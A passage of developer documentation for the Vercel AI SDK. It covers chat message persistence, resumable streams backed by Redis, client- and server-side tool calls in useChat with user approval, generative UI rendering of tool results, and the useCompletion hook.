type: 'start',
messageId: generateId(), // Generate server-side ID for persistence
});
const result = streamText({
model: 'openai/gpt-5-mini',
messages: await convertToModelMessages(messages),
});
writer.merge(result.toUIMessageStream({ sendStart: false })); // omit start message part
},
originalMessages: messages,
onFinish: ({ responseMessage }) => {
// save your chat here
},
});
return createUIMessageStreamResponse({ stream });
}
Similarly, you can control the format of client-side user message IDs by providing a generateId function to useChat:
import { createIdGenerator } from 'ai';
import { useChat } from '@ai-sdk/react';
const { ... } = useChat({
generateId: createIdGenerator({
prefix: 'msgc',
size: 16,
}),
// ...
});
Sending only the last message
Once you have implemented message persistence, you might want to send only the last message to the server. This reduces the amount of data sent to the server on each request and can improve performance.
To achieve this, you can provide a prepareSendMessagesRequest function to the transport.
This function receives the messages and the chat ID, and returns the request body to be sent to the server.
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
const {
// ...
} = useChat({
// ...
transport: new DefaultChatTransport({
api: '/api/chat',
// only send the last message to the server:
prepareSendMessagesRequest({ messages, id }) {
return { body: { message: messages[messages.length - 1], id } };
},
}),
});
On the server, you can then load the previous messages and append the new message to the previous messages. If your messages contain tools, metadata, or custom data parts, you should validate them:
import { convertToModelMessages, UIMessage, validateUIMessages } from 'ai';
// import your tools and schemas
export async function POST(req: Request) {
// get the last message from the client:
const { message, id } = await req.json();
// load the previous messages from the server:
const previousMessages = await loadChat(id);
// validate messages if they contain tools, metadata, or data parts:
const validatedMessages = await validateUIMessages({
// append the new message to the previous messages:
messages: [...previousMessages, message],
tools, // if using tools
metadataSchema, // if using custom metadata
dataSchemas, // if using custom data parts
});
const result = streamText({
// ...
messages: convertToModelMessages(validatedMessages),
});
return result.toUIMessageStreamResponse({
originalMessages: validatedMessages,
onFinish: ({ messages }) => {
saveChat({ chatId: id, messages });
},
});
}
Handling client disconnects
By default, the AI SDK streamText function uses backpressure to the language model provider to prevent
the consumption of tokens that are not yet requested.
However, this means that when the client disconnects, e.g. by closing the browser tab or because of a network issue, the stream from the LLM will be aborted and the conversation may end up in a broken state.
Assuming that you have a storage solution in place, you can use the consumeStream method to consume the stream on the backend,
and then save the result as usual.
consumeStream effectively removes the backpressure,
meaning that the result is stored even when the client has already disconnected.
import { convertToModelMessages, streamText, UIMessage } from 'ai';
import { saveChat } from '@util/chat-store';
export async function POST(req: Request) {
const { messages, chatId }: { messages: UIMessage[]; chatId: string } =
await req.json();
const result = streamText({
model,
messages: await convertToModelMessages(messages),
});
// consume the stream to ensure it runs to completion & triggers onFinish
// even when the client response is aborted:
result.consumeStream(); // no await
return result.toUIMessageStreamResponse({
originalMessages: messages,
onFinish: ({ messages }) => {
saveChat({ chatId, messages });
},
});
}
When the client reloads the page after a disconnect, the chat will be restored from the storage solution.
For more robust handling of disconnects, you may want to add resumability on disconnects. Check out the Chatbot Resume Streams documentation to learn more.
title: Chatbot Resume Streams
description: Learn how to resume chatbot streams after client disconnects.
Chatbot Resume Streams
useChat supports resuming ongoing streams after page reloads. Use this feature to build applications with long-running generations.
How stream resumption works
Stream resumption requires persistence for messages and active streams in your application. The AI SDK provides tools to connect to storage, but you need to set up the storage yourself.
The AI SDK provides:
- A resume option in useChat that automatically reconnects to active streams
- Access to the outgoing stream through the consumeSseStream callback
- Automatic HTTP requests to your resume endpoints
You build:
You build:
- Storage to track which stream belongs to each chat
- Redis to store the UIMessage stream
- Two API endpoints: POST to create streams, GET to resume them
- Integration with
resumable-streamto manage Redis storage
Prerequisites
To implement resumable streams in your chat application, you need:
- The
resumable-streampackage - Handles the publisher/subscriber mechanism for streams - A Redis instance - Stores stream data (e.g. Redis through Vercel)
- A persistence layer - Tracks which stream ID is active for each chat (e.g. database)
Implementation
1. Client-side: Enable stream resumption
Use the resume option in the useChat hook to enable stream resumption. When resume is true, the hook automatically attempts to reconnect to any active stream for the chat on mount:
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport, type UIMessage } from 'ai';
export function Chat({
chatData,
resume = false,
}: {
chatData: { id: string; messages: UIMessage[] };
resume?: boolean;
}) {
const { messages, sendMessage, status } = useChat({
id: chatData.id,
messages: chatData.messages,
resume, // Enable automatic stream resumption
transport: new DefaultChatTransport({
// You must send the id of the chat
prepareSendMessagesRequest: ({ id, messages }) => {
return {
body: {
id,
message: messages[messages.length - 1],
},
};
},
}),
});
return <div>{/* Your chat UI */}</div>;
}
When you enable resume, the useChat hook makes a GET request to /api/chat/[id]/stream on mount to check for and resume any active streams.
Let's start by creating the POST handler to create the resumable stream.
2. Create the POST handler
The POST handler creates resumable streams using the consumeSseStream callback:
import { openai } from '@ai-sdk/openai';
import { readChat, saveChat } from '@util/chat-store';
import {
convertToModelMessages,
generateId,
streamText,
type UIMessage,
} from 'ai';
import { after } from 'next/server';
import { createResumableStreamContext } from 'resumable-stream';
export async function POST(req: Request) {
const {
message,
id,
}: {
message: UIMessage | undefined;
id: string;
} = await req.json();
const chat = await readChat(id);
let messages = chat.messages;
messages = [...messages, message!];
// Clear any previous active stream and save the user message
saveChat({ id, messages, activeStreamId: null });
const result = streamText({
model: 'openai/gpt-5-mini',
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse({
originalMessages: messages,
generateMessageId: generateId,
onFinish: ({ messages }) => {
// Clear the active stream when finished
saveChat({ id, messages, activeStreamId: null });
},
async consumeSseStream({ stream }) {
const streamId = generateId();
// Create a resumable stream from the SSE stream
const streamContext = createResumableStreamContext({ waitUntil: after });
await streamContext.createNewResumableStream(streamId, () => stream);
// Update the chat with the active stream ID
saveChat({ id, activeStreamId: streamId });
},
});
}
3. Implement the GET handler
Create a GET handler at /api/chat/[id]/stream that:
- Reads the chat ID from the route params
- Loads the chat data to check for an active stream
- Returns 204 (No Content) if no stream is active
- Resumes the existing stream if one is found
import { readChat } from '@util/chat-store';
import { UI_MESSAGE_STREAM_HEADERS } from 'ai';
import { after } from 'next/server';
import { createResumableStreamContext } from 'resumable-stream';
export async function GET(
_: Request,
{ params }: { params: Promise<{ id: string }> },
) {
const { id } = await params;
const chat = await readChat(id);
if (chat.activeStreamId == null) {
// no content response when there is no active stream
return new Response(null, { status: 204 });
}
const streamContext = createResumableStreamContext({
waitUntil: after,
});
return new Response(
await streamContext.resumeExistingStream(chat.activeStreamId),
{ headers: UI_MESSAGE_STREAM_HEADERS },
);
}
How it works
Request lifecycle
[Diagram: the request lifecycle of a resumable stream]
The diagram above shows the complete lifecycle of a resumable stream:
- Stream creation: When you send a new message, the POST handler uses streamText to generate the response. The consumeSseStream callback creates a resumable stream with a unique ID and stores it in Redis through the resumable-stream package
- Stream tracking: Your persistence layer saves the activeStreamId in the chat data
- Client reconnection: When the client reconnects (page reload), the resume option triggers a GET request to /api/chat/[id]/stream
- Stream recovery: The GET handler checks for an activeStreamId and uses resumeExistingStream to reconnect. If no active stream exists, it returns a 204 (No Content) response
- Completion cleanup: When the stream finishes, the onFinish callback clears the activeStreamId by setting it to null
Customize the resume endpoint
By default, the useChat hook makes a GET request to /api/chat/[id]/stream when resuming. You can customize this endpoint, along with credentials and headers, using the prepareReconnectToStreamRequest option in DefaultChatTransport:
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
export function Chat({ chatData, resume }) {
const { messages, sendMessage } = useChat({
id: chatData.id,
messages: chatData.messages,
resume,
transport: new DefaultChatTransport({
// Customize reconnect settings (optional)
prepareReconnectToStreamRequest: ({ id }) => {
return {
api: `/api/chat/${id}/stream`, // Default pattern
// Or use a different pattern:
// api: `/api/streams/${id}/resume`,
// api: `/api/resume-chat?id=${id}`,
credentials: 'include', // Include cookies/auth
headers: {
Authorization: 'Bearer token',
'X-Custom-Header': 'value',
},
};
},
}),
});
return <div>{/* Your chat UI */}</div>;
}
This lets you:
- Match your existing API route structure
- Add query parameters or custom paths
- Integrate with different backend architectures
Important considerations
- Incompatibility with abort: Stream resumption is not compatible with abort functionality. Closing a tab or refreshing the page triggers an abort signal that will break the resumption mechanism. Do not use resume: true if you need abort functionality in your application
- Stream expiration: Streams in Redis expire after a set time (configurable in the resumable-stream package)
- Multiple clients: Multiple clients can connect to the same stream simultaneously
- Error handling: When no active stream exists, the GET handler returns a 204 (No Content) status code
- Security: Ensure proper authentication and authorization for both creating and resuming streams
- Race conditions: Clear the activeStreamId when starting a new stream to prevent resuming outdated streams
title: Chatbot Tool Usage description: Learn how to use tools with the useChat hook.
Chatbot Tool Usage
With useChat and streamText, you can use tools in your chatbot application.
The AI SDK supports three types of tools in this context:
- Automatically executed server-side tools
- Automatically executed client-side tools
- Tools that require user interaction, such as confirmation dialogs
The flow is as follows:
- The user enters a message in the chat UI.
- The message is sent to the API route.
- In your server-side route, the language model generates tool calls during the streamText call.
- All tool calls are forwarded to the client.
- Server-side tools are executed using their execute method and their results are forwarded to the client.
- Client-side tools that should be automatically executed are handled with the onToolCall callback. You must call addToolOutput to provide the tool result.
- Client-side tools that require user interaction can be displayed in the UI. The tool calls and results are available as tool invocation parts in the parts property of the last assistant message.
- When the user interaction is done, addToolOutput can be used to add the tool result to the chat.
- The chat can be configured to automatically submit when all tool results are available using sendAutomaticallyWhen. This triggers another iteration of this flow.
The tool calls and tool executions are integrated into the assistant message as typed tool parts. A tool part is at first a tool call, and then it becomes a tool result when the tool is executed. The tool result contains all information about the tool call as well as the result of the tool execution.
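As a simplified sketch (assuming only the states used in this guide; see the SDK types for the full definition), a typed tool part looks roughly like this:
// Simplified sketch of a typed tool part; not the SDK's full type.
type ToolPartSketch =
  | { type: `tool-${string}`; toolCallId: string; state: 'input-streaming'; input?: unknown }
  | { type: `tool-${string}`; toolCallId: string; state: 'input-available'; input: unknown }
  | { type: `tool-${string}`; toolCallId: string; state: 'output-available'; input: unknown; output: unknown }
  | { type: `tool-${string}`; toolCallId: string; state: 'output-error'; input: unknown; errorText: string };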
Example
In this example, we'll use three tools:
- getWeatherInformation: An automatically executed server-side tool that returns the weather in a given city.
- askForConfirmation: A user-interaction client-side tool that asks the user for confirmation.
- getLocation: An automatically executed client-side tool that returns a random city.
API route
import { convertToModelMessages, streamText, UIMessage } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: __MODEL__,
messages: await convertToModelMessages(messages),
tools: {
// server-side tool with execute function:
getWeatherInformation: {
description: 'show the weather in a given city to the user',
inputSchema: z.object({ city: z.string() }),
execute: async ({}: { city: string }) => {
const weatherOptions = ['sunny', 'cloudy', 'rainy', 'snowy', 'windy'];
return weatherOptions[
Math.floor(Math.random() * weatherOptions.length)
];
},
},
// client-side tool that starts user interaction:
askForConfirmation: {
description: 'Ask the user for confirmation.',
inputSchema: z.object({
message: z.string().describe('The message to ask for confirmation.'),
}),
},
// client-side tool that is automatically executed on the client:
getLocation: {
description:
'Get the user location. Always ask for confirmation before using this tool.',
inputSchema: z.object({}),
},
},
});
return result.toUIMessageStreamResponse();
}
Client-side page
The client-side page uses the useChat hook to create a chatbot application with real-time message streaming.
Tool calls are displayed in the chat UI as typed tool parts.
Please make sure to render the messages using the parts property of the message.
There are three things worth mentioning:
- The onToolCall callback is used to handle client-side tools that should be automatically executed. In this example, the getLocation tool is a client-side tool that returns a random city. You call addToolOutput to provide the result (without await to avoid potential deadlocks).
- The sendAutomaticallyWhen option with the lastAssistantMessageIsCompleteWithToolCalls helper automatically submits when all tool results are available.
- The parts array of assistant messages contains tool parts with typed names like tool-askForConfirmation. The client-side tool askForConfirmation is displayed in the UI. It asks the user for confirmation and displays the result once the user confirms or denies the execution. The result is added to the chat using addToolOutput with the tool parameter for type safety.
'use client';
import { useChat } from '@ai-sdk/react';
import {
DefaultChatTransport,
lastAssistantMessageIsCompleteWithToolCalls,
} from 'ai';
import { useState } from 'react';
export default function Chat() {
const { messages, sendMessage, addToolOutput } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
sendAutomaticallyWhen: lastAssistantMessageIsCompleteWithToolCalls,
// run client-side tools that are automatically executed:
async onToolCall({ toolCall }) {
// Check if it's a dynamic tool first for proper type narrowing
if (toolCall.dynamic) {
return;
}
if (toolCall.toolName === 'getLocation') {
const cities = ['New York', 'Los Angeles', 'Chicago', 'San Francisco'];
// No await - avoids potential deadlocks
addToolOutput({
tool: 'getLocation',
toolCallId: toolCall.toolCallId,
output: cities[Math.floor(Math.random() * cities.length)],
});
}
},
});
const [input, setInput] = useState('');
return (
<>
{messages?.map(message => (
<div key={message.id}>
<strong>{`${message.role}: `}</strong>
{message.parts.map(part => {
switch (part.type) {
// render text parts as simple text:
case 'text':
return part.text;
// for tool parts, use the typed tool part names:
case 'tool-askForConfirmation': {
const callId = part.toolCallId;
switch (part.state) {
case 'input-streaming':
return (
<div key={callId}>Loading confirmation request...</div>
);
case 'input-available':
return (
<div key={callId}>
{part.input.message}
<div>
<button
onClick={() =>
addToolOutput({
tool: 'askForConfirmation',
toolCallId: callId,
output: 'Yes, confirmed.',
})
}
>
Yes
</button>
<button
onClick={() =>
addToolOutput({
tool: 'askForConfirmation',
toolCallId: callId,
output: 'No, denied',
})
}
>
No
</button>
</div>
</div>
);
case 'output-available':
return (
<div key={callId}>
Location access allowed: {part.output}
</div>
);
case 'output-error':
return <div key={callId}>Error: {part.errorText}</div>;
}
break;
}
case 'tool-getLocation': {
const callId = part.toolCallId;
switch (part.state) {
case 'input-streaming':
return (
<div key={callId}>Preparing location request...</div>
);
case 'input-available':
return <div key={callId}>Getting location...</div>;
case 'output-available':
return <div key={callId}>Location: {part.output}</div>;
case 'output-error':
return (
<div key={callId}>
Error getting location: {part.errorText}
</div>
);
}
break;
}
case 'tool-getWeatherInformation': {
const callId = part.toolCallId;
switch (part.state) {
// example of pre-rendering streaming tool inputs:
case 'input-streaming':
return (
<pre key={callId}>{JSON.stringify(part, null, 2)}</pre>
);
case 'input-available':
return (
<div key={callId}>
Getting weather information for {part.input.city}...
</div>
);
case 'output-available':
return (
<div key={callId}>
Weather in {part.input.city}: {part.output}
</div>
);
case 'output-error':
return (
<div key={callId}>
Error getting weather for {part.input.city}:{' '}
{part.errorText}
</div>
);
}
break;
}
}
})}
<br />
</div>
))}
<form
onSubmit={e => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
}}
>
<input value={input} onChange={e => setInput(e.target.value)} />
</form>
</>
);
}
Error handling
Sometimes an error may occur during client-side tool execution. Use the addToolOutput method with a state of output-error and an errorText value instead of output to record the error.
'use client';
import { useChat } from '@ai-sdk/react';
import {
DefaultChatTransport,
lastAssistantMessageIsCompleteWithToolCalls,
} from 'ai';
import { useState } from 'react';
export default function Chat() {
const { messages, sendMessage, addToolOutput } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
sendAutomaticallyWhen: lastAssistantMessageIsCompleteWithToolCalls,
// run client-side tools that are automatically executed:
async onToolCall({ toolCall }) {
// Check if it's a dynamic tool first for proper type narrowing
if (toolCall.dynamic) {
return;
}
if (toolCall.toolName === 'getWeatherInformation') {
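// getWeatherInformation here is assumed to be your own client-side
// helper (e.g. a fetch to a weather API); it is not part of the AI SDK.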
try {
const weather = await getWeatherInformation(toolCall.input);
// No await - avoids potential deadlocks
addToolOutput({
tool: 'getWeatherInformation',
toolCallId: toolCall.toolCallId,
output: weather,
});
} catch (err) {
addToolOutput({
tool: 'getWeatherInformation',
toolCallId: toolCall.toolCallId,
state: 'output-error',
errorText: 'Unable to get the weather information',
});
}
}
},
});
return <div>{/* Your chat UI */}</div>;
}
Tool Execution Approval
Tool execution approval lets you require user confirmation before a server-side tool runs. Unlike client-side tools that execute in the browser, tools with approval still execute on the server—but only after the user approves.
Use tool execution approval when you want to:
- Confirm sensitive operations (payments, deletions, external API calls)
- Let users review tool inputs before execution
- Add human oversight to automated workflows
For tools that need to run in the browser (updating UI state, accessing browser APIs), use client-side tools instead.
Server Setup
Enable approval by setting needsApproval on your tool. See Tool Execution Approval for configuration options including dynamic approval based on input.
import { streamText, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
export async function POST(req: Request) {
const { messages } = await req.json();
const result = streamText({
model: __MODEL__,
messages,
tools: {
getWeather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
city: z.string(),
}),
needsApproval: true,
execute: async ({ city }) => {
const weather = await fetchWeather(city);
return weather;
},
}),
},
});
return result.toUIMessageStreamResponse();
}
Client-Side Approval UI
When a tool requires approval, the tool part state is approval-requested. Use addToolApprovalResponse to approve or deny:
'use client';
import { useChat } from '@ai-sdk/react';
export default function Chat() {
const { messages, addToolApprovalResponse } = useChat();
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.parts.map(part => {
if (part.type === 'tool-getWeather') {
switch (part.state) {
case 'approval-requested':
return (
<div key={part.toolCallId}>
<p>Get weather for {part.input.city}?</p>
<button
onClick={() =>
addToolApprovalResponse({
id: part.approval.id,
approved: true,
})
}
>
Approve
</button>
<button
onClick={() =>
addToolApprovalResponse({
id: part.approval.id,
approved: false,
})
}
>
Deny
</button>
</div>
);
case 'output-available':
return (
<div key={part.toolCallId}>
Weather in {part.input.city}: {part.output}
</div>
);
}
}
// Handle other part types...
})}
</div>
))}
</>
);
}
Auto-Submit After Approval
Use lastAssistantMessageIsCompleteWithApprovalResponses to automatically continue the conversation after approvals:
import { useChat } from '@ai-sdk/react';
import { lastAssistantMessageIsCompleteWithApprovalResponses } from 'ai';
const { messages, addToolApprovalResponse } = useChat({
sendAutomaticallyWhen: lastAssistantMessageIsCompleteWithApprovalResponses,
});
Dynamic Tools
When using dynamic tools (tools with unknown types at compile time), the UI parts use a generic dynamic-tool type instead of specific tool types:
{
message.parts.map((part, index) => {
switch (part.type) {
// Static tools with specific (`tool-${toolName}`) types
case 'tool-getWeatherInformation':
return <WeatherDisplay part={part} />;
// Dynamic tools use generic `dynamic-tool` type
case 'dynamic-tool':
return (
<div key={index}>
<h4>Tool: {part.toolName}</h4>
{part.state === 'input-streaming' && (
<pre>{JSON.stringify(part.input, null, 2)}</pre>
)}
{part.state === 'output-available' && (
<pre>{JSON.stringify(part.output, null, 2)}</pre>
)}
{part.state === 'output-error' && (
<div>Error: {part.errorText}</div>
)}
</div>
);
}
});
}
Dynamic tools are useful when integrating with:
- MCP (Model Context Protocol) tools without schemas
- User-defined functions loaded at runtime
- External tool providers
Tool call streaming
Tool call streaming is enabled by default in AI SDK 5.0, allowing you to stream tool calls while they are being generated. This provides a better user experience by showing tool inputs as they are generated in real-time.
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: __MODEL__,
messages: await convertToModelMessages(messages),
// toolCallStreaming is enabled by default in v5
// ...
});
return result.toUIMessageStreamResponse();
}
With tool call streaming enabled, partial tool calls are streamed as part of the data stream.
They are available through the useChat hook.
The typed tool parts of assistant messages will also contain partial tool calls.
You can use the state property of the tool part to render the correct UI.
export default function Chat() {
// ...
return (
<>
{messages?.map(message => (
<div key={message.id}>
{message.parts.map(part => {
switch (part.type) {
case 'tool-askForConfirmation':
case 'tool-getLocation':
case 'tool-getWeatherInformation':
switch (part.state) {
case 'input-streaming':
return <pre>{JSON.stringify(part.input, null, 2)}</pre>;
case 'input-available':
return <pre>{JSON.stringify(part.input, null, 2)}</pre>;
case 'output-available':
return <pre>{JSON.stringify(part.output, null, 2)}</pre>;
case 'output-error':
return <div>Error: {part.errorText}</div>;
}
}
})}
</div>
))}
</>
);
}
Step start parts
When you are using multi-step tool calls, the AI SDK will add step start parts to the assistant messages.
If you want to display boundaries between tool calls, you can use the step-start parts as follows:
// ...
// where you render the message parts:
message.parts.map((part, index) => {
switch (part.type) {
case 'step-start':
// show step boundaries as horizontal lines:
return index > 0 ? (
<div key={index} className="text-gray-500">
<hr className="my-2 border-gray-300" />
</div>
) : null;
case 'text':
// ...
case 'tool-askForConfirmation':
case 'tool-getLocation':
case 'tool-getWeatherInformation':
// ...
}
});
// ...
Server-side Multi-Step Calls
You can also use multi-step calls on the server-side with streamText.
This works when all invoked tools have an execute function on the server side.
import { convertToModelMessages, streamText, UIMessage, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: __MODEL__,
messages: await convertToModelMessages(messages),
tools: {
getWeatherInformation: {
description: 'show the weather in a given city to the user',
inputSchema: z.object({ city: z.string() }),
// tool has execute function:
execute: async ({}: { city: string }) => {
const weatherOptions = ['sunny', 'cloudy', 'rainy', 'snowy', 'windy'];
return weatherOptions[
Math.floor(Math.random() * weatherOptions.length)
];
},
},
},
stopWhen: stepCountIs(5),
});
return result.toUIMessageStreamResponse();
}
Errors
Language models can make errors when calling tools. By default, these errors are masked for security reasons, and show up as "An error occurred" in the UI.
To surface the errors, you can use the onError function when calling toUIMessageStreamResponse.
export function errorHandler(error: unknown) {
if (error == null) {
return 'unknown error';
}
if (typeof error === 'string') {
return error;
}
if (error instanceof Error) {
return error.message;
}
return JSON.stringify(error);
}
const result = streamText({
// ...
});
return result.toUIMessageStreamResponse({
onError: errorHandler,
});
In case you are using createUIMessageResponse, you can provide the onError function as an option:
const response = createUIMessageResponse({
// ...
async execute(dataStream) {
// ...
},
onError: error => `Custom error: ${error.message}`,
});
title: Generative User Interfaces description: Learn how to build Generative UI with AI SDK UI.
Generative User Interfaces
Generative user interfaces (generative UI) let a large language model (LLM) go beyond text and "generate UI". This creates a more engaging and AI-native experience for users.
At the core of generative UI are tools, which are functions you provide to the model to perform specialized tasks like getting the weather in a location. The model can decide when and how to use these tools based on the context of the conversation.
Generative UI is the process of connecting the results of a tool call to a React component. Here's how it works:
- You provide the model with a prompt or conversation history, along with a set of tools.
- Based on the context, the model may decide to call a tool.
- If a tool is called, it will execute and return data.
- This data can then be passed to a React component for rendering.
By passing the tool results to React components, you can create a generative UI experience that's more engaging and adaptive to your needs.
Build a Generative UI Chat Interface
Let's create a chat interface that handles text-based conversations and incorporates dynamic UI elements based on model responses.
Basic Chat Implementation
Start with a basic chat implementation using the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Page() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat();
const handleSubmit = (e: React.FormEvent) => {
e.preventDefault();
sendMessage({ text: input });
setInput('');
};
return (
<div>
{messages.map(message => (
<div key={message.id}>
<div>{message.role === 'user' ? 'User: ' : 'AI: '}</div>
<div>
{message.parts.map((part, index) => {
if (part.type === 'text') {
return <span key={index}>{part.text}</span>;
}
return null;
})}
</div>
</div>
))}
<form onSubmit={handleSubmit}>
<input
value={input}
onChange={e => setInput(e.target.value)}
placeholder="Type a message..."
/>
<button type="submit">Send</button>
</form>
</div>
);
}
To handle the chat requests and model responses, set up an API route:
import { streamText, convertToModelMessages, UIMessage, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;
export async function POST(request: Request) {
const { messages }: { messages: UIMessage[] } = await request.json();
const result = streamText({
model: __MODEL__,
system: 'You are a friendly assistant!',
messages: await convertToModelMessages(messages),
stopWhen: stepCountIs(5),
});
return result.toUIMessageStreamResponse();
}
This API route uses the streamText function to process chat messages and stream the model's responses back to the client.
Create a Tool
Before enhancing your chat interface with dynamic UI elements, you need to create a tool and corresponding React component. A tool will allow the model to perform a specific action, such as fetching weather information.
Create a new file called ai/tools.ts with the following content:
import { tool as createTool } from 'ai';
import { z } from 'zod';
export const weatherTool = createTool({
description: 'Display the weather for a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async function ({ location }) {
await new Promise(resolve => setTimeout(resolve, 2000));
return { weather: 'Sunny', temperature: 75, location };
},
});
export const tools = {
displayWeather: weatherTool,
};
In this file, you've created a tool called weatherTool. It simulates fetching weather information for a given location, returning simulated data after a 2-second delay. In a real-world application, you would replace this simulation with an actual API call to a weather service.
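For example, a version that calls a real endpoint might look like the sketch below; the URL and the response fields (condition, temp) are hypothetical placeholders for your weather provider:
import { tool as createTool } from 'ai';
import { z } from 'zod';

export const weatherTool = createTool({
  description: 'Display the weather for a location',
  inputSchema: z.object({
    location: z.string().describe('The location to get the weather for'),
  }),
  execute: async ({ location }) => {
    // Hypothetical weather endpoint; replace with your provider's API.
    const res = await fetch(
      `https://api.example.com/weather?q=${encodeURIComponent(location)}`,
    );
    if (!res.ok) throw new Error(`Weather API error: ${res.status}`);
    const data = await res.json();
    return { weather: data.condition, temperature: data.temp, location };
  },
});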
Update the API Route
Update the API route to include the tool you've defined:
import { streamText, convertToModelMessages, UIMessage, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;
import { tools } from '@/ai/tools';
export async function POST(request: Request) {
const { messages }: { messages: UIMessage[] } = await request.json();
const result = streamText({
model: __MODEL__,
system: 'You are a friendly assistant!',
messages: await convertToModelMessages(messages),
stopWhen: stepCountIs(5),
tools,
});
return result.toUIMessageStreamResponse();
}
Now that you've defined the tool and added it to your streamText call, let's build a React component to display the weather information it returns.
Create UI Components
Create a new file called components/weather.tsx:
type WeatherProps = {
temperature: number;
weather: string;
location: string;
};
export const Weather = ({ temperature, weather, location }: WeatherProps) => {
return (
<div>
<h2>Current Weather for {location}</h2>
<p>Condition: {weather}</p>
<p>Temperature: {temperature}°F</p>
</div>
);
};
This component will display the weather information for a given location. It takes three props: temperature, weather, and location (exactly what the weatherTool returns).
Render the Weather Component
Now that you have your tool and corresponding React component, let's integrate them into your chat interface. You'll render the Weather component when the model calls the weather tool.
To check if the model has called a tool, you can check the parts array of the UIMessage object for tool-specific parts. In AI SDK 5.0, tool parts use typed naming: tool-${toolName} instead of generic types.
Update your page.tsx file:
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
import { Weather } from '@/components/weather';
export default function Page() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat();
const handleSubmit = (e: React.FormEvent) => {
e.preventDefault();
sendMessage({ text: input });
setInput('');
};
return (
<div>
{messages.map(message => (
<div key={message.id}>
<div>{message.role === 'user' ? 'User: ' : 'AI: '}</div>
<div>
{message.parts.map((part, index) => {
if (part.type === 'text') {
return <span key={index}>{part.text}</span>;
}
if (part.type === 'tool-displayWeather') {
switch (part.state) {
case 'input-available':
return <div key={index}>Loading weather...</div>;
case 'output-available':
return (
<div key={index}>
<Weather {...part.output} />
</div>
);
case 'output-error':
return <div key={index}>Error: {part.errorText}</div>;
default:
return null;
}
}
return null;
})}
</div>
</div>
))}
<form onSubmit={handleSubmit}>
<input
value={input}
onChange={e => setInput(e.target.value)}
placeholder="Type a message..."
/>
<button type="submit">Send</button>
</form>
</div>
);
}
In this updated code snippet, you:
- Use manual input state management with
useStateinstead of the built-ininputandhandleInputChange. - Use
sendMessageinstead ofhandleSubmitto send messages. - Check the
partsarray of each message for different content types. - Handle tool parts with type
tool-displayWeatherand their different states (input-available,output-available,output-error).
This approach allows you to dynamically render UI components based on the model's responses, creating a more interactive and context-aware chat experience.
Expanding Your Generative UI Application
You can enhance your chat application by adding more tools and components, creating a richer and more versatile user experience. Here's how you can expand your application:
Adding More Tools
To add more tools, simply define them in your ai/tools.ts file:
// Add a new stock tool
export const stockTool = createTool({
description: 'Get price for a stock',
inputSchema: z.object({
symbol: z.string().describe('The stock symbol to get the price for'),
}),
execute: async function ({ symbol }) {
// Simulated API call
await new Promise(resolve => setTimeout(resolve, 2000));
return { symbol, price: 100 };
},
});
// Update the tools object
export const tools = {
displayWeather: weatherTool,
getStockPrice: stockTool,
};
Now, create a new file called components/stock.tsx:
type StockProps = {
price: number;
symbol: string;
};
export const Stock = ({ price, symbol }: StockProps) => {
return (
<div>
<h2>Stock Information</h2>
<p>Symbol: {symbol}</p>
<p>Price: ${price}</p>
</div>
);
};
Finally, update your page.tsx file to include the new Stock component:
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
import { Weather } from '@/components/weather';
import { Stock } from '@/components/stock';
export default function Page() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat();
const handleSubmit = (e: React.FormEvent) => {
e.preventDefault();
sendMessage({ text: input });
setInput('');
};
return (
<div>
{messages.map(message => (
<div key={message.id}>
<div>{message.role}</div>
<div>
{message.parts.map((part, index) => {
if (part.type === 'text') {
return <span key={index}>{part.text}</span>;
}
if (part.type === 'tool-displayWeather') {
switch (part.state) {
case 'input-available':
return <div key={index}>Loading weather...</div>;
case 'output-available':
return (
<div key={index}>
<Weather {...part.output} />
</div>
);
case 'output-error':
return <div key={index}>Error: {part.errorText}</div>;
default:
return null;
}
}
if (part.type === 'tool-getStockPrice') {
switch (part.state) {
case 'input-available':
return <div key={index}>Loading stock price...</div>;
case 'output-available':
return (
<div key={index}>
<Stock {...part.output} />
</div>
);
case 'output-error':
return <div key={index}>Error: {part.errorText}</div>;
default:
return null;
}
}
return null;
})}
</div>
</div>
))}
<form onSubmit={handleSubmit}>
<input
type="text"
value={input}
onChange={e => setInput(e.target.value)}
/>
<button type="submit">Send</button>
</form>
</div>
);
}
By following this pattern, you can continue to add more tools and components, expanding the capabilities of your Generative UI application.
title: Completion description: Learn how to use the useCompletion hook.
Completion
The useCompletion hook allows you to create a user interface to handle text completions in your application. It enables the streaming of text completions from your AI provider, manages the state for the prompt input, and updates the UI automatically as new chunks are received.
In this guide, you will learn how to use the useCompletion hook in your application to generate text completions and stream them in real-time to your users.
Example
'use client';
import { useCompletion } from '@ai-sdk/react';
export default function Page() {
const { completion, input, handleInputChange, handleSubmit } = useCompletion({
api: '/api/completion',
});
return (
<form onSubmit={handleSubmit}>
<input
name="prompt"
value={input}
onChange={handleInputChange}
id="input"
/>
<button type="submit">Submit</button>
<div>{completion}</div>
</form>
);
}
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
